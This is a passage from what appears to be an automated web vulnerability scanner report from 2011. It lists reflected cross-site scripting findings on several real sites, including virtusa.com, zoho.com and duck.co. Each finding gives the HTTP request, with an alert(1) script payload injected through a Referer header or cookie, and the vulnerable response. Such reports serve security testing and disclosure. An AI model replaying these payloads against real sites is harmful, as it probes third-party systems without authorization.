3.237. http://www.virtusa.com/contactus/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /contactus/

Request

GET /contactus/ HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=713bf"><script>alert(1)</script>ef1e48d07dd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:35:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:33 GMT
Content-Length: 34628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="ref" value="http://www.google.com/search?hl=en&q=713bf"><script>alert(1)</script>ef1e48d07dd" />
...[SNIP]...

3.238. http://www.virtusa.com/ftbu/contactus/default.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/contactus/default.asp

Request

GET /ftbu/contactus/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;
Referer: http://www.google.com/search?hl=en&q=df04c"><script>alert(1)</script>f4b577c20b3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37314
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:52:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:52:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="ref" value="http://www.google.com/search?hl=en&q=df04c"><script>alert(1)</script>f4b577c20b3" />
...[SNIP]...

3.239. http://www.watchmouse.com/en/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-aae30c915a39ee69d50753ca20be732f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016::en');
           var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referre
...[SNIP]...

3.240. https://accounts.zoho.com/login [iamcsr cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.co HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc267540033af84'-alert(1)-'63f4e742750; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:58:46 GMT
Server: ZWS
Content-Length: 20862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
rlencoded; charset=UTF-8');objHTTP.send(params);eval(objHTTP.responseText);}

function resendConfirmation(eid) {
   var csrfParam = 'iamcsrcoo=17d8938e-e664-4e84-8c5d-c1bc267540033af84'-alert(1)-'63f4e742750';
   var params = "email=" + euc(eid.toLowerCase()) + "&servicename=ZohoDiscussions&serviceurl=" + euc('http://duck.co') + "&"+csrfParam;//No I18N
   sendRequest("/u/em/confirm", p
...[SNIP]...

3.241. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=4de67%3balert(1)//33e2200b3e9; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=4de67;alert(1)//33e2200b3e9; expires=Fri, 27-May-2011 21:31:25 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hK5JalZb0bfZ00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 2143

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4645229).replace(/\[%tp_flightid%\]/ig,2240932).replace(/\[%tp_campaignid%\]/ig,132985);}var ebO = new Object();ebO.w=125;ebO.h=125;ebO.ai=4645229;ebO.pi=0;ebO.d=4de67;alert(1)//33e2200b3e9;ebO.rnd=0000000211113368;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-s
...[SNIP]...

3.242. http://duck.co/duckduckgo-forum [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /duckduckgo-forum

Request

GET /duckduckgo-forum HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543d4b07"><script>alert(1)</script>f49ddc5fcb9;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9D13104C15EB1E8D390120FECC57EC20; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543d4b07"><script>alert(1)</script>f49ddc5fcb9"/>
...[SNIP]...

3.243. http://duck.co/duckduckgo-forum [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /duckduckgo-forum

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /duckduckgo-forum HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437e1c1"-alert(1)-"17c9373cf4b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=826EAE51C09D778DF421381E0880E1C5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295437e1c1"-alert(1)-"17c9373cf4b";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.244. http://duck.co/portalLogin.do [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /portalLogin.do

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954351383"-alert(1)-"3daab87181;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=45EAA3A41F950E574CF5DC6AB9781262; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:30 GMT
Server: Apache-Coyote/1.1
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

Login Pag
...[SNIP]...
if(typeof postToForum != "undefined")
{
options.postToForum = postToForum;
}
options["zdrpn"] = "0e3ab477-02f7-44ed-afa7-3623cc72954351383"-alert(1)-"3daab87181";
$.ajax(
{
url: "/sendFeedback.do",
type: "POST",
data: options,
error: function (err,
...[SNIP]...

3.245. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-25-news-stories-to-comment-on

Request

GET /topic/2-25-news-stories-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954337a19"><script>alert(1)</script>07d36bf9d7c;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7AAF55631A4E7907BB8D040821A46654; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954337a19"><script>alert(1)</script>07d36bf9d7c"/>
...[SNIP]...

3.246. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-25-news-stories-to-comment-on

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/2-25-news-stories-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295436d8c8"-alert(1)-"eee24b8033f;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D719FF1058FD1B3D76E6BDA74139C96A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295436d8c8"-alert(1)-"eee24b8033f";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.247. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-28-articles-to-comment-on

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/2-28-articles-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954325360"-alert(1)-"5fb29255c29;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=262D3FC9A57F0B2D8CDCCF248D7FBDCC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954325360"-alert(1)-"5fb29255c29";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.248. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-28-articles-to-comment-on

Request

GET /topic/2-28-articles-to-comment-on HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954383d5d"><script>alert(1)</script>7f79b8e93ad;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B41830B8EB6B7F95DD4D2823292E8582; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:48 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954383d5d"><script>alert(1)</script>7f79b8e93ad"/>
...[SNIP]...

3.249. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/about-com-s-web-search-readers-choice-awards

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/about-com-s-web-search-readers-choice-awards HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954380559"-alert(1)-"49f5270fd4d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A4FC21B1B46F738E14E4A0ED7E2A68C8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954380559"-alert(1)-"49f5270fd4d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.250. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/about-com-s-web-search-readers-choice-awards

Request

GET /topic/about-com-s-web-search-readers-choice-awards HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295439dfa3"><script>alert(1)</script>e029db6b9d4;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=20670DBA5075DAECAF8D20C525CF0343; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:16 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295439dfa3"><script>alert(1)</script>e029db6b9d4"/>
...[SNIP]...

3.251. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/boolean-operators-and-parentheses-for-search-query

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/boolean-operators-and-parentheses-for-search-query HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543fe012"-alert(1)-"91b46d1f4f5;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=36A02A04817D8BEF6CFD14DB2A6F416A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543fe012"-alert(1)-"91b46d1f4f5";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.252. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/boolean-operators-and-parentheses-for-search-query

Request

GET /topic/boolean-operators-and-parentheses-for-search-query HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295436c89e"><script>alert(1)</script>8bccce57195;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EB67844155F9DF515B9ADD2B52B7BD57; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:48 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295436c89e"><script>alert(1)</script>8bccce57195"/>
...[SNIP]...

3.253. http://duck.co/topic/cached-archived-links [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/cached-archived-links

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/cached-archived-links HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954339b45"-alert(1)-"9d20e516917;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=29E4E1F01E1C166563ADBFC86CFA423B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
